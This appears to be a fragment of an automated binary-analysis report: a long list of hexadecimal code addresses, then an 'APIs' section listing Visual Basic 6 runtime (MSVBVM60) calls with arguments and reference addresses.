0x00414d46
0x00414d4b
0x00414d50
0x00414d56
0x00414d5c
0x00414d61
0x00414d61
0x00414d77
0x00414d81
0x00414d86
0x00414d94
0x00414db1
0x00414d96
0x00414d96
0x00414d9b
0x00414da0
0x00414da5
0x00414da5
0x00414dc3
0x00414dc9
0x00414dcd
0x00414dd3
0x00414dda
0x00414dee
0x00414df1
0x00414df3
0x00414e00
0x00414e22
0x00414e02
0x00414e02
0x00414e04
0x00414e09
0x00414e0f
0x00414e15
0x00414e1a
0x00414e1a
0x00414e2f
0x00414e2f
0x00414e34
0x00414e42
0x00414e5f
0x00414e44
0x00414e44
0x00414e49
0x00414e4e
0x00414e53
0x00414e53
0x00414e83
0x00414e8a
0x00414e8f
0x00414ea3
0x00414ea9
0x00414eab
0x00414eb8
0x00414edd
0x00414eba
0x00414eba
0x00414ebf
0x00414ec4
0x00414eca
0x00414ed0
0x00414ed5
0x00414ed5
0x00414ee4
0x00414eea
0x00414eef
0x00414ef6
0x00414f00
0x00414f10
0x00414f17
0x00414f18
0x00414f1d
0x00414f27
0x00414f37
0x00414f38
0x00414f3e
0x00414f3f
0x00414f44
0x00414f51
0x00414f58
0x00414f59
0x00414f5b
0x00414f60
0x00414f63
0x00414f6c
0x00414f72
0x00414f79
0x00414f83
0x00414f8d
0x00414f97
0x00414fa1
0x00414fab
0x00414fbb
0x00414fc2
0x00414fc9
0x00414fca
0x00414fd0
0x00414fd1
0x00414fd2
0x00414fd5
0x00414fd7
0x00414fd8
0x00414fd9
0x00414fdc
0x00414fde
0x00414fdf
0x00414fe0
0x00414fe3
0x00414fe8
0x00414ff4
0x00414ffb
0x00415002
0x00415003
0x00415005
0x0041500a
0x0041500d
0x0041501a
0x0041501b
0x00415020
0x00415028
0x0041502f
0x00415030
0x0041503e
0x00415049
0x0041504e
0x00415055
0x0041505c
0x00415066
0x00415070
0x0041507a
0x00415084
0x0041508e
0x00415098
0x004150a2
0x004150ac
0x004150b6
0x004150c0
0x004150ca
0x004150db
0x004150f8
0x004150dd
0x004150dd
0x004150e2
0x004150e7
0x004150ec
0x004150ec
0x0041511c
0x00415123
0x00415128
0x00415143
0x00415149
0x0041514b
0x00415158
0x0041517d
0x0041515a
0x0041515a
0x0041515f
0x00415164
0x0041516a
0x00415170
0x00415175
0x00415175
0x0041518a
0x00415190
0x0041519d
0x004151a3
0x004151b3
0x004151ba
0x004151c1
0x004151c8
0x004151cf
0x004151d6
0x004151dd
0x004151de
0x004151e8
0x004151f3
0x004151fe
0x00415205
0x0041520c
0x00415213
0x0041521a
0x00415221
0x00415222
0x00415228
0x00415229
0x0041522b
0x00415230
0x00415230
0x00415233
0x0041523a
0x0041523f
0x00415247
0x0041524d
0x0041525b
0x00415278
0x0041525d
0x0041525d
0x00415262
0x00415267
0x0041526c
0x0041526c
0x0041528a
0x004152a5
0x004152a8
0x004152aa
0x004152b7
0x004152d9
0x004152b9
0x004152b9
0x004152bb
0x004152c0
0x004152c6
0x004152cc
0x004152d1
0x004152d1
0x004152e6
0x004152ec
0x004152f6
0x00415307
0x00415324
0x00415309
0x00415309
0x0041530e
0x00415313
0x00415318
0x00415318
0x00415348
0x0041534f
0x00415354
0x0041536f
0x00415375
0x00415377
0x00415384
0x004153a9
0x00415386
0x00415386
0x0041538b
0x00415390
0x00415396
0x0041539c
0x004153a1
0x004153a1
0x004153b3
0x004153c0
0x004153c1
0x004153c2
0x004153c3
0x004153d8
0x004153de
0x004153e0
0x004153ed
0x00415412
0x004153ef
0x004153ef
0x004153f4
0x004153f9
0x004153ff
0x00415405
0x0041540a
0x0041540a
0x0041541f
0x0041542a
0x00415431
0x00415432
0x00415434
0x0041543c
0x00415443
0x00415445
0x00415447
0x00415449
0x00415451
0x00415452
0x00415454
0x00415459
0x0041545e
0x00415461
0x0041546d
0x0041546f
0x00415475
0x0041547e
0x00415483
0x00415491
0x004154ae
0x00415493
0x00415493
0x00415498
0x0041549d
0x004154a2
0x004154a2
0x004154d2
0x004154d9
0x004154de
0x004154f9
0x004154ff
0x00415501
0x0041550e
0x00415533
0x00415510
0x00415510
0x00415515
0x0041551a
0x00415520
0x00415526
0x0041552b
0x0041552b
0x00415540
0x00415542
0x00415548
0x00415551
0x0041555c
0x00415567
0x0041556c
0x00415578
0x0041557a
0x00415580
0x00415589
0x0041558e
0x0041559a
0x0041559c
0x004155a2
0x004155ab
0x004155b0
0x004155be
0x004155db
0x004155c0
0x004155c0
0x004155c5
0x004155ca
0x004155cf
0x004155cf
0x004155ff
0x00415606
0x0041560b
0x00415626
0x0041562c
0x0041562e
0x0041563b
0x00415660
0x0041563d
0x0041563d
0x00415642
0x00415647
0x0041564d
0x00415653
0x00415658
0x00415658
0x0041566d
0x0041566f
0x00415675
0x0041567e
0x00415689
0x00415694
0x00415699
0x004156a7
0x004156c4
0x004156a9
0x004156a9
0x004156ae
0x004156b3
0x004156b8
0x004156b8
0x004156e8
0x004156ef
0x004156f4
0x0041570f
0x00415712
0x00415714
0x00415721
0x00415743
0x00415723
0x00415723
0x00415725
0x0041572a
0x00415730
0x00415736
0x0041573b
0x0041573b
0x00415750
0x00415752
0x00415758
0x00415761
0x0041576c
0x00415777
0x0041577c
0x00415788
0x0041578a
0x00415790
0x00415799
0x0041579e
0x004157aa
0x004157ac
0x004157b2
0x004157bb
0x004157c0
0x004157cc
0x004157ce
0x004157d4
0x004157dd
0x004157e2
0x004157ee
0x004157f0
0x004157f6
0x004157ff
0x00415804
0x00415812
0x0041582f
0x00415814
0x00415814
0x00415819
0x0041581e
0x00415823
0x00415823
0x00415853
0x0041585a
0x0041585f
0x0041587c
0x00415882
0x00415884
0x00415891
0x004158b6
0x00415893
0x00415893
0x00415898
0x0041589d
0x004158a3
0x004158a9
0x004158ae
0x004158ae
0x004158c3
0x004158c5
0x004158cb
0x004158d4
0x004158df
0x004158ea
0x004158ef
0x004158fd
0x0041591a
0x004158ff
0x004158ff
0x00415904
0x00415909
0x0041590e
0x0041590e
0x0041593e
0x00415945
0x0041594a
0x00415965
0x0041596b
0x0041596d
0x0041597a
0x0041599f
0x0041597c
0x0041597c
0x00415981
0x00415986
0x0041598c
0x00415992
0x00415997
0x00415997
0x004159a6
0x004159a8
0x004159aa
0x004159b0
0x004159b6
0x004159b7
0x004159bf
0x004159c0
0x004159cd
0x004159d4
0x004159d6
0x004159dc
0x004159e5
0x004159f0
0x004159fb
0x00415a02
0x00415a03
0x00415a05
0x00415a0a
0x00415a13
0x00415a18
0x00415a26
0x00415a43
0x00415a28
0x00415a28
0x00415a2d
0x00415a32
0x00415a37
0x00415a37
0x00415a67
0x00415a6e
0x00415a73
0x00415a8e
0x00415a91
0x00415a93
0x00415aa0
0x00415ac2
0x00415aa2
0x00415aa2
0x00415aa4
0x00415aa9
0x00415aaf
0x00415ab5
0x00415aba
0x00415aba
0x00415acf
0x00415ad1
0x00415ad7
0x00415ae0
0x00415aeb
0x00415af6
0x00415afb
0x00415b07
0x00415b09
0x00415b0f
0x00415b18
0x00415b1d
0x00415b2b
0x00415b48
0x00415b2d
0x00415b2d
0x00415b32
0x00415b37
0x00415b3c
0x00415b3c
0x00415b6c
0x00415b73
0x00415b78
0x00415b95
0x00415b9b
0x00415b9d
0x00415baa
0x00415bcf
0x00415bac
0x00415bac
0x00415bb1
0x00415bb6
0x00415bbc
0x00415bc2
0x00415bc7
0x00415bc7
0x00415bdc
0x00415bde
0x00415be4
0x00415bed
0x00415bf8
0x00415c03
0x00415c08
0x00415c14
0x00415c16
0x00415c1c
0x00415c25
0x00415c2a
0x00415c38
0x00415c55
0x00415c3a
0x00415c3a
0x00415c3f
0x00415c44
0x00415c49
0x00415c49
0x00415c79
0x00415c80
0x00415c85
0x00415ca0
0x00415ca6
0x00415ca8
0x00415cb5
0x00415cda
0x00415cb7
0x00415cb7
0x00415cbc
0x00415cc1
0x00415cc7
0x00415ccd
0x00415cd2
0x00415cd2
0x00415ce7
0x00415ce9
0x00415cef
0x00415cf8
0x00415d03
0x00415d0e
0x00415d13
0x00415d1f
0x00415d21
0x00415d27
0x00415d30
0x00415d35
0x00415d41
0x00415d43
0x00415d49
0x00415d52
0x00415d57
0x00415d63
0x00415d65
0x00415d6b
0x00415d74
0x00415d79
0x00415d87
0x00415da4
0x00415d89
0x00415d89
0x00415d8e
0x00415d93
0x00415d98
0x00415d98
0x00415dc8
0x00415dcf
0x00415dd4
0x00415def
0x00415df5
0x00415df7
0x00415e04
0x00415e29
0x00415e06
0x00415e06
0x00415e0b
0x00415e10
0x00415e16
0x00415e1c
0x00415e21
0x00415e21
0x00415e36
0x00415e38
0x00415e3e
0x00415e47
0x00415e52
0x00415e5d
0x00415e62
0x00415e6e
0x00415e70
0x00415e76
0x00415e7f
0x00415e84
0x00415e90
0x00415e92
0x00415e98
0x00415ea1
0x00415ea6
0x00415eb4
0x00415ed1
0x00415eb6
0x00415eb6
0x00415ebb
0x00415ec0
0x00415ec5
0x00415ec5
0x00415ef5
0x00415efc
0x00415f01
0x00415f1c
0x00415f22
0x00415f24
0x00415f31
0x00415f56
0x00415f33
0x00415f33
0x00415f38
0x00415f3d
0x00415f43
0x00415f49
0x00415f4e
0x00415f4e
0x00415f63
0x00415f65
0x00415f6b
0x00415f74
0x00415f7f
0x00415f8a
0x00415f8f
0x00415f9b
0x00415f9d
0x00415fa3
0x00415fac
0x00415fb1
0x00415fbd
0x00415fbf
0x00415fc5
0x00415fce
0x00415fd3
0x00415fe1
0x00415ffe
0x00415fe3
0x00415fe3
0x00415fe8
0x00415fed
0x00415ff2
0x00415ff2
0x00416022
0x00416029
0x0041602e
0x00416049
0x0041604f
0x00416051
0x0041605e
0x00416083
0x00416060
0x00416060
0x00416065
0x0041606a
0x00416070
0x00416076
0x0041607b
0x0041607b
0x00416090
0x00416092
0x00416098
0x004160a1
0x004160ac
0x004160b7
0x004160bc
0x004160c8
0x004160ca
0x004160d0
0x004160d9
0x004160de
0x004160ec
0x00416109
0x004160ee
0x004160ee
0x004160f3
0x004160f8
0x004160fd
0x004160fd
0x0041612d
0x00416134
0x00416139
0x00416156
0x0041615c
0x0041615e
0x0041616b
0x00416190
0x0041616d
0x0041616d
0x00416172
0x00416177
0x0041617d
0x00416183
0x00416188
0x00416188
0x0041619d
0x0041619f
0x004161a5
0x004161ae
0x004161b9
0x004161c4
0x004161c9
0x004161d7
0x004161f4
0x004161d9
0x004161d9
0x004161de
0x004161e3
0x004161e8
0x004161e8
0x00416218
0x0041621f
0x00416224
0x0041623f
0x00416242
0x00416244
0x00416251
0x00416273
0x00416253
0x00416253
0x00416255
0x0041625a
0x00416260
0x00416266
0x0041626b
0x0041626b
0x00416280
0x00416282
0x00416288
0x00416291
0x0041629c
0x004162a7
0x004162ac
0x004162b8
0x004162ba
0x004162c0
0x004162c9
0x004162ce
0x004162dc
0x004162f9
0x004162de
0x004162de
0x004162e3
0x004162e8
0x004162ed
0x004162ed
0x0041631d
0x00416324
0x00416329
0x00416346
0x0041634c
0x0041634e
0x0041635b
0x00416380
0x0041635d
0x0041635d
0x00416362
0x00416367
0x0041636d
0x00416373
0x00416378
0x00416378
0x0041638d
0x0041638f
0x00416395
0x0041639e
0x004163a9
0x004163b4
0x004163b9
0x004163c5
0x004163c7
0x004163cd
0x004163d6
0x004163db
0x004163e9
0x00416406
0x004163eb
0x004163eb
0x004163f0
0x004163f5
0x004163fa
0x004163fa
0x0041642a
0x00416431
0x00416436
0x00416451
0x00416457
0x00416459
0x00416466
0x0041648b
0x00416468
0x00416468
0x0041646d
0x00416472
0x00416478
0x0041647e
0x00416483
0x00416483
0x00416498
0x0041649a
0x004164a0
0x004164a9
0x004164b4
0x004164bf
0x004164c4
0x004164d2
0x004164ef
0x004164d4
0x004164d4
0x004164d9
0x004164de
0x004164e3
0x004164e3
0x00416513
0x0041651a
0x0041651f
0x0041653a
0x00416540
0x00416542
0x0041654f
0x00416574
0x00416551
0x00416551
0x00416556
0x0041655b
0x00416561
0x00416567
0x0041656c
0x0041656c
0x00416581
0x00416583
0x00416589
0x00416592
0x0041659d
0x004165a8
0x004165ad
0x004165bb
0x004165d8
0x004165bd
0x004165bd
0x004165c2
0x004165c7
0x004165cc
0x004165cc
0x004165fc
0x00416603
0x00416608
0x00416623
0x00416629
0x0041662b
0x00416638
0x0041665d
0x0041663a
0x0041663a
0x0041663f
0x00416644
0x0041664a
0x00416650
0x00416655
0x00416655
0x0041666a
0x0041666c
0x00416672
0x0041667b
0x00416686
0x00416691
0x00416696
0x004166a2
0x004166a4
0x004166aa
0x004166b3
0x004166b8
0x004166c6
0x004166e3
0x004166c8
0x004166c8
0x004166cd
0x004166d2
0x004166d7
0x004166d7
0x00416707
0x0041670e
0x00416713
0x00416730
0x00416736
0x00416738
0x00416745
0x0041676a
0x00416747
0x00416747
0x0041674c
0x00416751
0x00416757
0x0041675d
0x00416762
0x00416762
0x00416777
0x00416779
0x0041677f
0x00416788
0x00416793
0x0041679e
0x004167a3
0x004167b1
0x004167ce
0x004167b3
0x004167b3
0x004167b8
0x004167bd
0x004167c2
0x004167c2
0x004167f2
0x004167f9
0x004167fe
0x00416819
0x0041681f
0x00416821
0x0041682e
0x00416853
0x00416830
0x00416830
0x00416835
0x0041683a
0x00416840
0x00416846
0x0041684b
0x0041684b
0x00416860
0x00416862
0x00416868
0x00416871
0x0041687c
0x00416887
0x0041688c
0x0041689a
0x004168b7
0x0041689c
0x0041689c
0x004168a1
0x004168a6
0x004168ab
0x004168ab
0x004168db
0x004168e2
0x004168e7
0x00416902
0x00416908
0x0041690a
0x00416917
0x0041693c
0x00416919
0x00416919
0x0041691e
0x00416923
0x00416929
0x0041692f
0x00416934
0x00416934
0x00416949
0x0041694b
0x00416951
0x0041695a
0x00416965
0x00416970
0x00416975
0x00416981
0x00416983
0x00416989
0x00416992
0x00416997
0x004169a5
0x004169c2
0x004169a7
0x004169a7
0x004169ac
0x004169b1
0x004169b6
0x004169b6
0x004169e6
0x004169ed
0x004169f2
0x00416a0d
0x00416a13
0x00416a15
0x00416a22
0x00416a47
0x00416a24
0x00416a24
0x00416a29
0x00416a2e
0x00416a34
0x00416a3a
0x00416a3f
0x00416a3f
0x00416a54
0x00416a56
0x00416a5c
0x00416a65
0x00416a70
0x00416a7b
0x00416a80
0x00416a8e
0x00416aab
0x00416a90
0x00416a90
0x00416a95
0x00416a9a
0x00416a9f
0x00416a9f
0x00416acf
0x00416ad6
0x00416adb
0x00416af6
0x00416af9
0x00416afb
0x00416b08
0x00416b2a
0x00416b0a
0x00416b0a
0x00416b0c
0x00416b11
0x00416b17
0x00416b1d
0x00416b22
0x00416b22
0x00416b37
0x00416b39
0x00416b3f
0x00416b48
0x00416b53
0x00416b5e
0x00416b63
0x00416b71
0x00416b8e
0x00416b73
0x00416b73
0x00416b78
0x00416b7d
0x00416b82
0x00416b82
0x00416bb2
0x00416bb9
0x00416bbe
0x00416bd9
0x00416bdf
0x00416be1
0x00416bee
0x00416c13
0x00416bf0
0x00416bf0
0x00416bf5
0x00416bfa
0x00416c00
0x00416c06
0x00416c0b
0x00416c0b
0x00416c20
0x00416c22
0x00416c28
0x00416c31
0x00416c3c
0x00416c47
0x00416c4c
0x00416c5a
0x00416c77
0x00416c5c
0x00416c5c
0x00416c61
0x00416c66
0x00416c6b
0x00416c6b
0x00416c9b
0x00416ca2
0x00416ca7
0x00416cc2
0x00416cc8
0x00416cca
0x00416cd7
0x00416cfc
0x00416cd9
0x00416cd9
0x00416cde
0x00416ce3
0x00416ce9
0x00416cef
0x00416cf4
0x00416cf4
0x00416d09
0x00416d0b
0x00416d11
0x00416d1a
0x00416d25
0x00416d30
0x00416d35
0x00416d41
0x00416d43
0x00416d49
0x00416d52
0x00416d57
0x00416d65
0x00416d82
0x00416d67
0x00416d67
0x00416d6c
0x00416d71
0x00416d76
0x00416d76
0x00416da6
0x00416dad
0x00416db2
0x00416dcd
0x00416dd0
0x00416dd2
0x00416ddf
0x00416e01
0x00416de1
0x00416de1
0x00416de3
0x00416de8
0x00416dee
0x00416df4
0x00416df9
0x00416df9
0x00416e0e
0x00416e10
0x00416e16
0x00416e1f
0x00416e2a
0x00416e35
0x00416e3a
0x00416e48
0x00416e65
0x00416e4a
0x00416e4a
0x00416e4f
0x00416e54
0x00416e59
0x00416e59
0x00416e89
0x00416e90
0x00416e95
0x00416eb0
0x00416eb6
0x00416eb8
0x00416ec5
0x00416eea
0x00416ec7
0x00416ec7
0x00416ecc
0x00416ed1
0x00416ed7
0x00416edd
0x00416ee2
0x00416ee2
0x00416ef7
0x00416ef9
0x00416eff
0x00416f08
0x00416f13
0x00416f1e
0x00416f23
0x00416f2f
0x00416f31
0x00416f37
0x00416f40
0x00416f45
0x00416f51
0x00416f53
0x00416f59
0x00416f62
0x00416f67
0x00416f73
0x00416f75
0x00416f7b
0x00416f84
0x00416f89
0x00416f97
0x00416fb4
0x00416f99
0x00416f99
0x00416f9e
0x00416fa3
0x00416fa8
0x00416fa8
0x00416fd8
0x00416fdf
0x00416fe4
0x00416fff
0x00417002
0x00417004
0x00417011
0x00417033
0x00417013
0x00417013
0x00417015
0x0041701a
0x00417020
0x00417026
0x0041702b
0x0041702b
0x00417040
0x00417042
0x00417048
0x00417051
0x0041705c
0x00417067
0x0041706c
0x00417078
0x0041707a
0x00417080
0x00417089
0x0041708e
0x0041709a
0x0041709c
0x004170a2
0x004170ab
0x004170b0
0x004170be
0x004170db
0x004170c0
0x004170c0
0x004170c5
0x004170ca
0x004170cf
0x004170cf
0x004170ff
0x00417106
0x0041710b
0x00417126
0x00417129
0x0041712b
0x00417138
0x0041715a
0x0041713a
0x0041713a
0x0041713c
0x00417141
0x00417147
0x0041714d
0x00417152
0x00417152
0x00417167
0x00417169
0x0041716f
0x00417178
0x00417183
0x0041718e
0x00417193
0x004171a1
0x004171be
0x004171a3
0x004171a3
0x004171a8
0x004171ad
0x004171b2
0x004171b2
0x004171e2
0x004171e9
0x004171ee
0x00417209
0x0041720f
0x00417211
0x0041721e
0x00417243
0x00417220
0x00417220
0x00417225
0x0041722a
0x00417230
0x00417236
0x0041723b
0x0041723b
0x00417250
0x00417252
0x00417258
0x00417261
0x0041726c
0x00417277
0x0041727c
0x00417288
0x0041728a
0x00417290
0x00417299
0x0041729e
0x004172aa
0x004172ac
0x004172b2
0x004172bb
0x004172c0
0x004172ce
0x004172eb
0x004172d0
0x004172d0
0x004172d5
0x004172da
0x004172df
0x004172df
0x0041730f
0x00417316
0x0041731b
0x00417336
0x0041733c
0x0041733e
0x0041734b
0x00417370
0x0041734d
0x0041734d
0x00417352
0x00417357
0x0041735d
0x00417363
0x00417368
0x00417368
0x0041737d
0x0041737f
0x00417385
0x0041738e
0x00417399
0x004173a4
0x004173a9
0x004173b5
0x004173b7
0x004173bd
0x004173c6
0x004173cb
0x004173d7
0x004173d9
0x004173df
0x004173e8
0x004173ed
0x004173f9
0x004173fb
0x00417401
0x0041740a
0x0041740f
0x0041741d
0x0041743a
0x0041741f
0x0041741f
0x00417424
0x00417429
0x0041742e
0x0041742e
0x0041745e
0x00417465
0x0041746a
0x00417485
0x0041748b
0x0041748d
0x0041749a
0x004174bf
0x0041749c
0x0041749c
0x004174a1
0x004174a6
0x004174ac
0x004174b2
0x004174b7
0x004174b7
0x004174c6
0x004174c8
0x004174ca
0x004174d0
0x004174d6
0x004174d7
0x004174df
0x004174e0
0x004174ed
0x004174f4
0x004174f6
0x004174fc
0x00417505
0x00417510
0x0041751b
0x00417522
0x00417523
0x00417525
0x0041752a
0x00417533
0x00417538
0x00417544
0x00417546
0x0041754c
0x00417555
0x0041755a
0x00417568
0x00417585
0x0041756a
0x0041756a
0x0041756f
0x00417574
0x00417579
0x00417579
0x004175a9
0x004175b0
0x004175b5
0x004175d0
0x004175d6
0x004175d8
0x004175e5
0x0041760a
0x004175e7
0x004175e7
0x004175ec
0x004175f1
0x004175f7
0x004175fd
0x00417602
0x00417602
0x00417617
0x00417619
0x0041761f
0x00417628
0x00417633
0x0041763e
0x00417643
0x0041764f
0x00417651
0x00417657
0x00417660
0x00417665
0x00417671
0x00417673
0x00417679
0x00417682
0x00417687
0x00417693
0x00417695
0x0041769b
0x004176a4
0x004176a9
0x004176b5
0x004176b7
0x004176bd
0x004176c6
0x004176cb
0x004176d2
0x004176e0
0x004176fd
0x004176e2
0x004176e2
0x004176e7
0x004176ec
0x004176f1
0x004176f1
0x0041770f
0x00417715
0x0041771f
0x00417729
0x00417733
0x00417747
0x00417754
0x00417755
0x00417756
0x00417757
0x0041775b
0x00417768
0x00417769
0x0041776a
0x0041776b
0x0041777a
0x0041777d
0x0041777f
0x0041778c
0x004177ae
0x0041778e
0x0041778e
0x00417790
0x00417795
0x0041779b
0x004177a1
0x004177a6
0x004177a6
0x004177bb
0x004177c2
0x004177c3
0x004177ce
0x004177d5
0x004177d6
0x004177e1
0x004177e1
0x004177e6
0x004177f4
0x00417811
0x004177f6
0x004177f6
0x004177fb
0x00417800
0x00417805
0x00417805
0x00417835
0x0041783c
0x00417841
0x00417847
0x00417851
0x0041785e
0x0041786b
0x0041786c
0x0041786d
0x0041786e
0x0041787d
0x00417883
0x00417885
0x00417892
0x004178b7
0x00417894
0x00417894
0x00417899
0x0041789e
0x004178a4
0x004178aa
0x004178af
0x004178af
0x004178c4
0x004178c9
0x004178d0
0x004178da
0x004178e4
0x004178ea
0x004178eb
0x004178ed
0x004178fa
0x004178ff
0x00417900
0x00417905
0x0041790c
0x00417912
0x0041791f
0x0041792a
0x00417938
0x0041793e
0x0041794c
0x00417969
0x0041794e
0x0041794e
0x00417953
0x00417958
0x0041795d
0x0041795d
0x0041797b
0x00417996
0x00417999
0x0041799b
0x004179a8
0x004179ca
0x004179aa
0x004179aa
0x004179ac
0x004179b1
0x004179b7
0x004179bd
0x004179c2
0x004179c2
0x004179d7
0x004179f2
0x004179f8
0x004179fa
0x00417a07
0x00417a2c
0x00417a09
0x00417a09
0x00417a0e
0x00417a13
0x00417a19
0x00417a1f
0x00417a24
0x00417a24
0x00417a39
0x00417a3f
0x00417a52
0x00417a5d
0x00417a62
0x00417a70
0x00417a8d
0x00417a72
0x00417a72
0x00417a77
0x00417a7c
0x00417a81
0x00417a81
0x00417a9f
0x00417aba
0x00417abd
0x00417abf
0x00417acc
0x00417aee
0x00417ace
0x00417ace
0x00417ad0
0x00417ad5
0x00417adb
0x00417ae1
0x00417ae6
0x00417ae6
0x00417afb
0x00417b16
0x00417b1c
0x00417b1e
0x00417b2b
0x00417b50
0x00417b2d
0x00417b2d
0x00417b32
0x00417b37
0x00417b3d
0x00417b43
0x00417b48
0x00417b48
0x00417b5d
0x00417b63
0x00417b76
0x00417b81
0x00417b86
0x00417b8d
0x00417b9b
0x00417bb8
0x00417b9d
0x00417b9d
0x00417ba2
0x00417ba7
0x00417bac
0x00417bac
0x00417bdc
0x00417be3
0x00417be8
0x00417c03
0x00417c09
0x00417c0b
0x00417c18
0x00417c3d
0x00417c1a
0x00417c1a
0x00417c1f
0x00417c24
0x00417c2a
0x00417c30
0x00417c35
0x00417c35
0x00417c44
0x00417c46
0x00417c48
0x00417c54
0x00417c55
0x00417c5a
0x00417c64
0x00417c81
0x00417c66
0x00417c66
0x00417c6b
0x00417c70
0x00417c75
0x00417c75
0x00417ca5
0x00417cac
0x00417cb1
0x00417ccc
0x00417ccf
0x00417cd1
0x00417cde
0x00417d00
0x00417ce0
0x00417ce0
0x00417ce2
0x00417ce7
0x00417ced
0x00417cf3
0x00417cf8
0x00417cf8
0x00417d0e
0x00417d2b
0x00417d10
0x00417d10
0x00417d15
0x00417d1a
0x00417d1f
0x00417d1f
0x00417d3d
0x00417d58
0x00417d5b
0x00417d5d
0x00417d6a
0x00417d8c
0x00417d6c
0x00417d6c
0x00417d6e
0x00417d73
0x00417d79
0x00417d7f
0x00417d84
0x00417d84
0x00417d99
0x00417dac
0x00417db3
0x00417dc0
0x00417dd4
0x00417dd7
0x00417dd9
0x00417de6
0x00417e08
0x00417de8
0x00417de8
0x00417dea
0x00417def
0x00417df5
0x00417dfb
0x00417e00
0x00417e00
0x00417e15
0x00417e1b
0x00417e2b
0x00417e36
0x00417e3d
0x00417e3e
0x00417e40
0x00417e4e
0x00417e55
0x00417e5c
0x00417e63
0x00417e64
0x00417e66
0x00417e6b
0x00417e74
0x00417e74
0x00417e79
0x00417e80
0x00417e8a
0x00417e94
0x00417e9a
0x00417ea0
0x00417eab
0x00417eb2
0x00417eb3
0x00417eb8
0x00417ec2
0x00417ed2
0x00417ed3
0x00417ed9
0x00417eda
0x00417edf
0x00417eec
0x00417ef3
0x00417ef4
0x00417ef6
0x00417f07
0x00417f0d
0x00417f14
0x00417f1e
0x00417f28
0x00417f2f
0x00417f34
0x00417f41
0x00417f46
0x00417f4d
0x00417f57
0x00417f61
0x00417f68
0x00417f6d
0x00417f72
0x00417f77
0x00417f7d
0x00417f82
0x00417f96
0x00417f9c
0x00417f9e
0x00417fa4
0x00417fab
0x00417fcd
0x00417fad
0x00417fad
0x00417fb2
0x00417fb7
0x00417fba
0x00417fc0
0x00417fc5
0x00417fc5
0x00417fab
0x00417fd4
0x00417fdb
0x00417fdd
0x00417fde
0x00417fdf
0x00417fe2
0x00417fe7
0x00417fec
0x00417ff2
0x00417ff4
0x00417ff5
0x00417ff7
0x00417ffe
0x00418004
0x00418005
0x0041800a
0x00418016
0x0041801b
0x00418022
0x00418024
0x00418029
0x00418030
0x00418037
0x0041803c
0x00418041
0x00418041
0x00418044
0x00418053
0x00418059
0x00418066
0x00418088
0x00418068
0x00418068
0x0041806d
0x00418072
0x00418075
0x0041807b
0x00418080
0x00418080
0x0041808f
0x004180a5
0x004180b1
0x004180b4
0x004180bb
0x004180c5
0x004180e8
0x004180ee
0x004180fd
0x00418103
0x00418112
0x00418118
0x00418125
0x00418147
0x00418127
0x00418127
0x0041812c
0x00418131
0x00418134
0x0041813a
0x0041813f
0x0041813f
0x0041814e
0x00418155
0x0041815f
0x00418169
0x00418173
0x0041817d
0x00418184
0x00418194
0x0041819b
0x004181a2
0x004181a9
0x004181b0
0x004181b1
0x004181b4
0x004181b5
0x004181ba
0x004183b2
0x004181c5
0x004181db
0x004181e7
0x004181ed
0x00418203
0x00418210
0x00418217
0x0041822d
0x00418233
0x00418240
0x00418262
0x00418242
0x00418242
0x00418247
0x0041824c
0x0041824f
0x00418255
0x0041825a
0x0041825a
0x0041826f
0x00418275
0x0041828b
0x00418297
0x0041829a
0x004182a8
0x004182c5
0x004182aa
0x004182aa
0x004182af
0x004182b4
0x004182b9
0x004182b9
0x004182e9
0x004182f0
0x004182f5
0x00418310
0x00418316
0x00418318
0x00418325
0x0041834a
0x00418327
0x00418327
0x0041832c
0x00418331
0x00418337
0x0041833d
0x00418342
0x00418342
0x00418357
0x00418372
0x0041837e
0x00418389
0x0041838e
0x0041839b
0x004183a2
0x004183a3
0x004183a6
0x004183a7
0x004183ac
0x004183ac
0x004183bf
0x004183c6
0x004183d8
0x004183db
0x004183dc

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00414282
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,?,00401536), ref: 004142D8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414314
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000130), ref: 00414361
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414386
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,00401536), ref: 004143A1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004143DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000158), ref: 0041442A
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041444F
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,?,?,?,?,00401536), ref: 0041446A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004144A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000158), ref: 004144F3
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414518
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 00414521
__vbaI4Var.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 0041452E
__vbaI4Var.MSVBVM60(?,00000000,?,00000000,00000000), ref: 0041453B
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,00000000), ref: 0041454C
__vbaNew2.MSVBVM60(00404358,00425010,00000000,?,00000000,?,00000000,00000000), ref: 00414564
__vbaObjSet.MSVBVM60(?,00000000), ref: 004145A0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000060), ref: 004145E7
__vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 00414648
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000), ref: 00414667
#648.MSVBVM60(0000000A), ref: 004146A0
__vbaFreeVar.MSVBVM60(0000000A), ref: 004146B2
__vbaNew2.MSVBVM60(00405078,00425698,0000000A), ref: 004146D1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,0000004C), ref: 00414736
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405088,00000028), ref: 0041478B
__vbaFreeObj.MSVBVM60(00000000,?,00405088,00000028), ref: 004147A5
#570.MSVBVM60(00000074), ref: 004147BA
__vbaNew2.MSVBVM60(00404358,00425010,?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000), ref: 004147DC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414818
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405048,00000180), ref: 00414865
__vbaNew2.MSVBVM60(00404358,00425010), ref: 0041488C
